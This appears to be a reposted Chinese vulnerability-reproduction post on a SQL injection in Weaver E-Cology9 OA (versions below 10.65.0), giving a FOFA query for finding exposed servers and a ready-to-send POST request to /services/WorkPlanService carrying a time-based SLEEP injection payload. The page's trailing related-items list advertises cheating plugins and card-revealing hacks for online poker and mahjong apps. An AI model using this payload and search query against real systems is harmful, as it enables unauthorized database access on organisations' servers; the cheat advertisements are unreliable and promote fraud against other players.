漏洞复现-F6-11泛微-E-Cology-SQL
创始人
2024-11-22 04:05:23
0

本文来自无问社区,更多漏洞信息可前往查看icon-default.png?t=N7T8http://www.wwlib.cn/index.php/artread/artid/15575.html

0x01 产品简介

泛微协同管理应用平台e-cology是一套企业级大型协同管理平台

0x02 漏洞概述

该漏洞是由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现 SQL 注入漏洞。

影响范围:泛微E-Cology9 < 10.65.0

0x03 复现环境

FOFO:app="泛微-OA(e-cology)"

POC

延时5秒
payload:

POST /services/WorkPlanService HTTP/1.1 HOST:  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Content-Type: text/xml;charset=UTF-8 Connection: close                                          (SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)                    22

效果图:
 

图片

上一篇:苹果8为什么字拉不上去

下一篇:常州网站推广_网站推广(SEO设置)

相关内容

热门资讯

广东雀神麻木智能插件安装,新荣... 广东雀神麻木智能插件安装,新荣耀平台辅助,白金岛放炮罚作弊码有哪些攻略1、超多福利:超高返利,海量正...
透视挂!aapoker破解侠是... 透视挂!aapoker破解侠是真的吗,aapoker怎么提高中牌率,揭秘教程(有挂脚本)aapoke...
透视讲解!德普之星辅助器,德普... 透视讲解!德普之星辅助器,德普之星透视辅助,揭秘教程(有挂教程)1、构建自己的微扑克辅助插件;2、选...
透视智能ai!wepoker私... 透视智能ai!wepoker私人局透视教程(透视)其实是有挂(解密教程)1、构建自己的wepoker...
广东雀神智能插件安装包,长春科... 广东雀神智能插件安装包,长春科乐作弊,创思维激k辅助器规律广东雀神智能插件安装包辅助器中分为三种模型...
透视私人局!德普之星有透视辅助... 透视私人局!德普之星有透视辅助吗,德普之星透视辅助,曝光教程(有挂介绍);致您一封信;亲爱德普之星有...
透视了解!aapoker破解侠... 透视了解!aapoker破解侠是真的吗,aapoker怎么拿好牌,黑科技教程(有挂插件)1、许多玩家...
透视黑科技!wepoker有插... 透视黑科技!wepoker有插件吗(透视)原来是有挂(必赢方法)1、游戏颠覆性的策略玩法,独创攻略技...
透视安装!德普之星怎么开辅助,... 透视安装!德普之星怎么开辅助,德普之星透视,第三方教程(有挂工具)1、金币登录送、破产送、升级送、活...
雀神智能插件安装价格,微信随意... 雀神智能插件安装价格,微信随意玩辅助器有开挂吗,新广西老友麻将开挂攻略小薇(透视辅助)致您一封信;亲...